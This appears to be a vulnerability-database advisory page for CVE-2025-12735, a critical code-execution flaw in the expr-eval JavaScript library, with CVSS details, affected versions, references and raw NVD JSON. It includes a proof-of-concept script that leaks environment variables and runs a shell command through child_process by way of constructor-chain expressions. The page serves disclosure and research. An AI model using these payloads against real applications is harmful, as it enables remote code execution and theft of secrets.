Security Vulnerability Report
中文
CVE-2025-12735 CVSS 9.8 CRITICAL

CVE-2025-12735

Published: 2025-11-05 01:15:33
Last Modified: 2026-02-10 17:33:25
Source: [email protected]

Description

The expr-eval library is a JavaScript expression parser and evaluator designed to safely evaluate mathematical expressions with user-defined variables. However, due to insufficient input validation, an attacker can pass a crafted context object or use MEMBER of the context object into the evaluate() function and trigger arbitrary code execution.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:jorenbroekema:javascript_expression_evaluator:3.0.0:*:*:*:*:node.js:*:* - VULNERABLE
cpe:2.3:a:silentmatt:javascript_expression_evaluator:*:*:*:*:*:node.js:*:* - VULNERABLE
silentmatt/expr-eval < 2.0.4
jorenbroekema/expr-eval < 2.0.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-12735 PoC - Remote Code Execution in expr-eval library // This PoC demonstrates arbitrary code execution via crafted context object const { Parser } = require('expr-eval'); // Malicious context object designed to trigger RCE const maliciousContext = { // Using constructor property to access Function constructor payload: { constructor: { constructor: Function } }, // Alternative: Using __proto__ to access prototype chain __proto__: { constructor: Function } }; // Attempt to execute arbitrary code try { // Method 1: Direct Function constructor access const expr1 = 'this.constructor.constructor("return process.env")()'; console.log('[+] Testing direct constructor access...'); const result1 = Parser.evaluate(expr1); console.log('[+] Environment variables leaked:', result1); } catch (e) { console.log('[-] Method 1 failed:', e.message); } try { // Method 2: Using context object with malicious properties const expr2 = 'data.constructor.constructor("return process")()'; console.log('[+] Testing context-based access...'); const result2 = Parser.evaluate(expr2, { data: maliciousContext }); console.log('[+] Process object accessed:', Object.keys(result2)); } catch (e) { console.log('[-] Method 2 failed:', e.message); } try { // Method 3: Execute shell command via child_process const expr3 = '({}).constructor.constructor("return require(\\"child_process\\").execSync(\\"id\\")")()'; console.log('[+] Testing command execution...'); const result3 = Parser.evaluate(expr3); console.log('[+] Command output:', result3.toString()); } catch (e) { console.log('[-] Method 3 failed:', e.message); } // Safe expression (for comparison) const safeExpr = 'x + y'; console.log('[+] Safe expression result:', Parser.evaluate(safeExpr, { x: 1, y: 2 }));

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12735", "sourceIdentifier": "[email protected]", "published": "2025-11-05T01:15:33.313", "lastModified": "2026-02-10T17:33:24.527", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The expr-eval library is a JavaScript expression parser and evaluator designed to safely evaluate mathematical expressions with user-defined variables. However, due to insufficient input validation, an attacker can pass a crafted context object or use MEMBER of the context object into the evaluate() function and trigger arbitrary code execution."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jorenbroekema:javascript_expression_evaluator:3.0.0:*:*:*:*:node.js:*:*", "matchCriteriaId": "CDE513F1-E3F7-4FA9-BD2B-D310CA8853BD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:silentmatt:javascript_expression_evaluator:*:*:*:*:*:node.js:*:*", "versionEndIncluding": "2.0.2", "matchCriteriaId": "3236DF0B-3012-4193-82D6-9D73D24D723F"}]}]}], "references": [{"url": "https://github.com/advisories/GHSA-jc85-fpwf-qm7x", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/jorenbroekema/expr-eval", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/silentmatt/expr-eval", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/silentmatt/expr-eval/pull/288", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://kb.cert.org/vuls/id/263614", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.npmjs.com/package/expr-eval", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.npmjs.com/package/expr-eval-fork", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.kb.cert.org/vuls/id/263614", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/jorenbroekema/expr-eval/blob/460b820ba01c5aca6c5d84a7d4f1fa5d1913c67b/test/security.js", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.